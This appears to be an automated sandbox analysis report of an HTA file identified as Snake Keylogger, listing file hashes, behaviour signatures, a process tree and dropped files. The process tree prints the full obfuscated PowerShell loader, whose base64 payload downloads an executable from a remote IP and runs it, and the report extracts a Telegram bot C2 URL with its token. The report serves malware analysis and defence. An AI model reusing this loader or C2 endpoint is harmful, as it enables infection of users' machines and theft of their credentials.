Analysis

  • max time kernel
    240s
  • max time network
    243s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
  • submitted
    16/10/2024, 01:40

General

  • Target

    16102024_0140_niceworkingprojectforeveryone.hta

  • Size

    165KB

  • MD5

    44ad3c49b38f4f6f1739baf86d528fd3

  • SHA1

    afcf27df0ee2373846a1f6b8027e9cfcea77c486

  • SHA256

    4e7237c56ca769460022e46e7585b630f9918be1cf427c180facd3edd22e6368

  • SHA512

    e2846bdafad1f3f2901171d3e3ca5744cd934ec6231bcef14327e17a8ac2aa225e254d25e1abca4a3465994979fa480b8f8a90be21754bb7a8f457d68102f691

  • SSDEEP

    96:Ea+n7bJh/qUh/qoR3hH+TJoAj/h/q9+SAT:Ea+7bJ5/pLA78WT

Malware Config

Extracted

Family

snakekeylogger

C2

https://api.telegram.org/bot7913958792:AAFOhfKo5L7M50XG6odxxQQwJAeD3zGEuJU/sendMessage?chat_id=7004340450

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

  • Snake Keylogger payload 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\16102024_0140_niceworkingprojectforeveryone.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2528
    • C:\Windows\SysWOW64\wINDowSPoweRSHell\V1.0\PoweRsHELl.ExE
      "C:\Windows\sysTeM32\wINDowSPoweRSHell\V1.0\PoweRsHELl.ExE" "pOwerSHelL -ex bYPAss -NOP -w 1 -c deVICECreDENtIALDEpLoyMeNt ; IeX($(IEx('[sySTeM.tExt.EncOdInG]'+[cHaR]0x3a+[CHAR]58+'UTf8.geTstrINg([SySteM.coNVeRt]'+[CHar]0X3A+[Char]58+'frOmbase64striNG('+[cHar]34+'JHhzZ1dMTGJ3cHcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYmVSREVGSU5JdElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxR0Fnd2p0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbG9VLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdnVEaE5SWGRkLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmtGUlVRQWIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiS2NkY3VuVHoiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZVNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiTE1URWdJVnBORyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHhzZ1dMTGJ3cHc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yNS8yNzAvdGFza2hvc3R3LmV4ZSIsIiRFTlY6QVBQREFUQVx0YXNraG9zdHcuZXhlIiwwLDApO1N0YVJ0LVNMRUVwKDMpO1NUYXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHRhc2tob3N0dy5leGUi'+[CHAR]0x22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2316
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPAss -NOP -w 1 -c deVICECreDENtIALDEpLoyMeNt
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2824
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a3erzvzu.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2868
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8602.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8601.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2772
      • C:\Users\Admin\AppData\Roaming\taskhostw.exe
        "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:2896
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
          4⤵
          • Accesses Microsoft Outlook profiles
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:2440

Network

        MITRE ATT&CK Enterprise v15

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\RES8602.tmp

          Filesize

          1KB

          MD5

          95620a347d51db77f4a5c57a6b1b840e

          SHA1

          6d7f9ef008c97b0a20d1411a446bfe14e2abb81c

          SHA256

          6562885a0315b918541689be9239a14fd4c44e3d53a5b544bce398682680fe5f

          SHA512

          a9edb4bb78916cd394946f73a8dbea798ac1fb3063df84dcbf97b341778445b438a303d8ed70f5ff3eb350e57cbef2731315b70d6b5ddaec70bfc10d62898224

        • C:\Users\Admin\AppData\Local\Temp\a3erzvzu.dll

          Filesize

          3KB

          MD5

          5c337f847566d92b9f38ce0f4c0cc8f3

          SHA1

          8ba8640810bbdfa72f02b1e55737bfffab49203a

          SHA256

          4a0a9201c590012f7a8e38cd42c220853f573c219fe48bea13aee7782cb92312

          SHA512

          b6adb63b0f933c3d408e99e591117e4926183276a923ad2428ce12d53f08824a338650046d2c35803b182da7a83a83b6f6df8f5b0b23491029269de7ba588557

        • C:\Users\Admin\AppData\Local\Temp\a3erzvzu.pdb

          Filesize

          7KB

          MD5

          2822de9663d6b2e4e0d911419c587a27

          SHA1

          6057202b17f53918cbc8efa925ed8d2cdd6723ea

          SHA256

          a79b6312d75f66ee9e5ccca0ea8b001f9db211c6d21c05fea9d4eb788fe7a67e

          SHA512

          3797e6161f4fdac62939385ed75e8384e3c1bae9ee5d06c2444f631f632fdc7d5d8a5a68be5d0cd1d1fc1ca782ea5ff302ad3e5e4ca3b3bb59c0bb03abf861a7

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

          Filesize

          7KB

          MD5

          aa159bd2e415cfd34e1f0815b05a246c

          SHA1

          a5076713116fa301c5f749a1b646a01db936a3b1

          SHA256

          ac7cdf7431b28953388ed21f99645cdc15ebe1efda468545a95876b0224e661f

          SHA512

          3f6e0f23ef4b3bc2201029efd0376ea9f8ed370ce8fcbc38d6171e33556c59fc5645618d88ed11f062c6f2158db67c4c1e40da382ae985dc6668eeb08d9d7b78

        • C:\Users\Admin\AppData\Roaming\taskhostw.exe

          Filesize

          948KB

          MD5

          3e2f27edd3deacd8f08f6ed1133b2040

          SHA1

          060e3218949c5a006bb8607e8228e6539b737bfb

          SHA256

          163a25e2b68ed09eb4cf82f28c87568969091764bdfb4140b4675a00e2d2ed86

          SHA512

          da437c39e3337f6750c3b9353c71999c16415ec1fecdaa4bba676bb12207cb51a7258b91b175d1893ae4e9111fa9ccf027151ad7527d9d78df59f86436cfdb42

        • \??\c:\Users\Admin\AppData\Local\Temp\CSC8601.tmp

          Filesize

          652B

          MD5

          b6578b91401729f486ddc70ef092c351

          SHA1

          9920c39989cf48f106a98a9092ede1816f90eff1

          SHA256

          bb0261b231cc16054f6cb81eee13f60aa45bd2040b2404b51f49860fae1e1d08

          SHA512

          72623414964a4862cbfd45fe27efd972458ba9ca3cc36b41894f08f3693acd246a51fcb7d003ed8a1d2a732df0d07a05457f4cffaeba3f02970eac549870c47b

        • \??\c:\Users\Admin\AppData\Local\Temp\a3erzvzu.0.cs

          Filesize

          475B

          MD5

          ecc2c10cb4c5954e2d5156bce54e41f4

          SHA1

          2d7cde31f9942c1dc80c493c03d675962991bf31

          SHA256

          21d7b2d886e9a8c3cf70d60b612151ecf35df156524dda00bc5f0c14df45b3ac

          SHA512

          bfce3f87e8f97f1a8f149c7f3e172e312019a4189fd1e33bdb7d2c617c6bbf41f548e91c12f71b5e8215397138ea643430f0ee87d72b33760c0dd2e3b8ae4d96

        • \??\c:\Users\Admin\AppData\Local\Temp\a3erzvzu.cmdline

          Filesize

          309B

          MD5

          a35aa4e335fdf2563f4fa23cf3d49f11

          SHA1

          62d90fa02d4a8a0a4952aa648ef61f296b09d6cf

          SHA256

          5507d350a25c56f0fb3b2ee88c8bb50a258f86ec4385fa70bf74fb5cad4dfa61

          SHA512

          53ff64f8ae3c4a605353ebb7de123c7468613b9afc31d5e09ad01d9022bd2fad3369e7026e3df128935059bd95f6e3607e94d3fb4227ea28d496b3010a256ed8

        • memory/2440-36-0x0000000000400000-0x0000000000426000-memory.dmp

          Filesize

          152KB

        • memory/2440-35-0x0000000000400000-0x0000000000426000-memory.dmp

          Filesize

          152KB

        • memory/2440-34-0x0000000000400000-0x0000000000426000-memory.dmp

          Filesize

          152KB